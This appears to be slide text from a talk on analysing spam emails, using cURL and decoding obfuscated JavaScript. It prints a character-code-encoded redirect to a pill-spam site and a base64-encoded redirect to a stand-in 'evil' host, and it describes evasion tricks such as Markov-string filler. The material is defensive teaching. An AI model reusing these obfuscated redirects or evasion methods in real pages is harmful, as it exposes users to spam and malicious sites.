  • 3. Spam Everybody gets it, some is obvious, some a little more sneaky and occasionally an email with actual value ends up caught in the email client’s spam net. The screen grab is from MS Outlook, which will show you just the text... Not the html. NO CLICKING LINKS! My example has lots of signs it is garbage and should be set to e-oblivion: • Do you really think that is a google team addy? • This is Not the format I give out for my email (gmail allows mixed caps and dots, like sT.eve.pOte so I can see who sells me out) • Delayed email at some blog URL? C’mon. (This is the URL I will use for an example) • No opt out? Not even one with a malicious addy behind it? They aren’t even trying…(an opt out is required by US law and legit businesses using mass mailings will always have a means to tell them to stop)
  • 4. cURL, short version and a headstart curl -L -v -A "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17“ http://somewhere.com The switches -L follow redirect (if response sends you immediately elsewhere. There are legitimate uses like url shorteners like goo.gl and bit.ly, but these are also good places to hide bad things too.) -v verbose (I always like verbose output…in this case there is more info about the connects, disconnects and redirects) -A user agent string to send (cURL pretends to be a browser by sending a browser’s info. Example uses pretty common string info to make it an attractive target.)
  • 5. Here we go… • Verbose text followed by the html of what you would see in your browser if you had clicked the link…
  • 6. …after some gibberish Most of what was returned was probably a “Markov string”, basically random-esque text with grammatical rules to fool ISP’s and others (like spam filters and web crawlers) into believing the target is legit. When an email slips by your filter with total nonsense in the body it is probably a Markov string and very hard to catch because each email can be made with unique content and including highly relevant individual words.
  • 7. …the part we are really after • JavaScript at the bottom…it is at the bottom so the rest of the page will load before potential errors or things that might catch malicious scripts • Mileage may vary. This example creates a string from ASCII character codes that have been shifted by -73 places. (I will break that down better later). Base 64 encoding is another common technique I have encountered often (there are legit business reasons to encode strings, I will show you how to check them too).
  • 8. Magic Happens Here… • I find JavaScript to be pretty Human Readable, but for this example I cheated with Excel… • I needed the ASCII numbers -73 • Then ran the String.fromCharCode in a browser address bar (don’t do this at home, not everything is harmless) • javascript:alert(String.fromCharCode(119,105,110,100,111,119,46,116,111,112,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,115,109 ,97,114,116,112,105,108,108,115,118,97,108,117,101,46,114,117,39,59)); • If you can write JavaScipt you can neuter the function like this… rather than returning the malicious command it alerts with its text.
  • 9. Oh, good…another scary link • Here is the output of our example using the chrome browser’s address bar • This JavaScript command redirects your browser to the link inside. • Anecdotally most of the time this is abusing google analytics by creating false hits…opens a couple valid pages, closes and moves on. • Every so often there is something nastier, tracking cookies (mild) or some more virulent web-herpes. • Drop this URL into cURL and repeat if you dare.
  • 10. A last tidbit or… d2luZG93LnRvcC5sb2NhdGlvbi5ocmVmPSdodHRwczovL3NvbWVldmlsYmFzdGFyZC5jb20n …for short • Base 64 encoding has honest upstanding uses • JavaScript has built in functions to encode (window.btoa())and decode (window.atob()) • I use them to send secret messages ;-) • They can also hide malicious intent
  • 11. Links for the curious • cURL man page - http://curl.haxx.se/docs/manpage.html • Opt out/Spam laws - https://www.ftc.gov/tips-advice/business-center/guidance/can-spam-act-compliance-guide-business • Markov strings - https://en.wikipedia.org/wiki/Markov_algorithm • atob – https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64/atob • JavaScript from the address bar - http://www.wikihow.com/Have-Fun-With-Your-Address-Bar-on-Your-Browser • Base 64 encoding - https://www.base64decode.org • Me, especially if you are looking for a full stack ‘white hat’ - https://www.linkedin.com/in/steve-pote-61b02b103